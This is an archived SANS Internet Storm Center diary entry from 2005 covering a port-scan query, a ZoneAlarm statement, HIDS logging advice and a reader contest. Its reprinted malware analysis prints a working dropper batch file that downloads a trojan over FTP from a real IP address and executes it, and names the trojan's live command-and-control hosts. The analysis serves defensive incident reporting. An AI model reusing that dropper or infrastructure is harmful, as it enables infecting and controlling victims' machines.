Threat Level: green Handler on Duty: Bojan Zdrnja

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-06-10 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Mailbag Question, ZoneAlarm failure update, Michael Jackson Malware analysis, More on HIDS, IM Name Game submissions

Published: 2005-06-10
Last Updated: 2005-06-10 21:31:55 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
A Question for System Profilers

A contributor has asked if anyone has information related to scans that they have received from remote systems with the following port profile:

PORT STATE SERVICE VERSION
22/tcp open ssh?
53/tcp open domain ISC Bind 9.2.1
6703/tcp open unknown
6721/tcp open unknown
6722/tcp open unknown
6723/tcp open unknown
6737/tcp open unknown
6750/tcp open unknown
6760/tcp open unknown
6767/tcp open unknown

"Please note the text returned from connections to port 22: "I wish I was special". There appears to be no actual sshd daemon listening. A scan of the high 6700 ports returns no data from any of the open ports."

ZoneAlarm Failure Update

We have been contacted by ZoneLabs (A Check Point Company) about yesterdays Diary entry and have been asked to post a link to their statement . According to a follow-up response to a question posed to ZoneLabs;

"Users using the ProgramAdvisor service in Automatic mode were potentially affected.

No systems were exposed as a result of the issue.

The firewall would not go into 'deny all', but would continue to enforce the current policy at the time the error occurred."
ZoneLabs -
Thanks for the answer!

Michael Jackson Suicide Note Malware

Several AV vendors are reporting the spreading of an email with a clickable link supposedly pointing to additional information on a Michael Jackson suicide note. Clicking the link takes the victim to a web site that installs malware using exploits customized for different browsers. The Storm Center received an excellent analysis of the malware from Matt Corothers and he has allowed us to reprint it here. Thanks, Matt!

"The server at abcnews-go.com was distributing malware via browser exploits (including Firefox). When you load the site, you get a fake "site is currently suspended" message, and a php script included as javascript checks your ip and browser. The first time you hit the site from a given ip, the php script then outputs some javascript that forwards you to the exploit page for your browser. Subsequent hits return nothing.

The exploit creates this batch file which downloads and executes a trojan via ftp from the same ip:

@ECHO OFF
:BEGIN
CLS
echo open 202.71.102.106>c:\1.dat
echo ls>>c:\1.dat
echo binary>>c:\1.dat
echo recv 1.exe c:\1.exe>>c:\1.dat
echo quit>>c:\1.dat
ftp -n -s:c:\1.dat -A
start /min c:\1.exe
del c:\1.dat

:END

1.exe periodically posts information about the infected computer to a cgi script at nugget-sales.com, currently 83.149.82.168.

The CGI responds with commands, the first of which is for the trojan to update itself using http to 83.149.82.168/dtr/rplay93.exe. rplay93.exe appears to be a different version of the same malware. It also periodically posts to the nugget-sales.com. Other than the update command, I'm not really sure what the trojan is supposed to be doing. Part of the cgi response appears to be a command to load www.microsoft.com, which it does occasionally.

Some of the IP addresses and links are still alive at the time of this writing, so exercise caution if your curiosity gets the best of you. The malware may also reappear at other sites in the future. Additional details are available on most major AV vendor sites.

Opinion - More on HIDS

Configuring HIDS Agents for important "event" reporting is always an interesting subject, one would hope that more than one set of eyes is involved in selecting the events to be reported. As noted in "The Tao of Network Security Monitoring Beyond Intrusion Detection", "the alert is only the beginning of the quest, not the end." Success here depends, of course, on the "Agent" capabilities/configurability and the range of experiences of the "team" selecting and classifying the importance of the events, events that are important for the environment where the Agents are deployed.

Over the _years_ I've found that IntersectAlliance's products for *.nix, Windows and some MS's apps, are as configurable as they get. I've also read other public posts about this product's performance. Extending this opinion, a
contributor recently sent in a link to a recent MS document that has a basic list of events to consider. I regret I don't have the contributor's name anymore so I can publically thank them for sending in the link, but "Thanks!".

So ... I'm soliciting Diary contributor suggestions for other lists of *Nix events that should be considered for logging with *.Nix or MS HIDS Agents. I'll post the list in my Diary next week. Anyone with product specific precompiled lists of "important" events logged is also invited to share (within the confines of your license!).

References:

The
are "Free, Open-Source, audit and event log agent software for a (HUGE/pn) variety of operating systems, and applications." Home users might consider giving the a whirl too, it's a "A basic, free, Open-Source, centralised audit and eventlog collection tool for Windows" and anything else that can export to syslog.

Microsoft's Document is
<A HREF="http://www.microsoft.com/downloads/details.aspx?FamilyID=95a85136-f08f-4b20-942f-dc9ce56bcd1a">
The Security Monitoring and Attack Detection Planning Guide



More on Snare at the SANS Reading Room.

The Tao of Network Security Monitoring Beyond Intrusion Detection By Richard Bejtlich, available online at


Other Other related resources are at
, read the tool's PDF's that come with the download.

IM attack Name Game Responses

From:
John
Forsythe
, "It's not meat, but it works: LIMA - layered instant message
attack".

Anonymous said "Not balogna but Wiener. There was an old commercial jingle, "I wish I were an Oscar Mayer wiener ..." Maybe wiener-job or wiener-work, etc. Thanks for all the great work you do."

Robert Darin said "Simple: WIMP - Windows IM parasite. Windows because only Microsoft based platforms are as risk to this type of cheap and pathetic attack."

Rhen Alderman suggested "phim" as an acronym for a ****** Instant Messenger.

Another anonymous suggestion - "You could always go with Wiener--as in, 'you've been wienered,' for Oscar-family
attacks."

And Jason Martin suggested "Instant Messaging --> In-Stunt Messaging. Or even In-Stunt Messa-Gang.".

Thanks everyone!


Patrick Nolan, with grateful assists from other Handlers and Contributors.
Keywords:
0 comment(s)
Diary Archives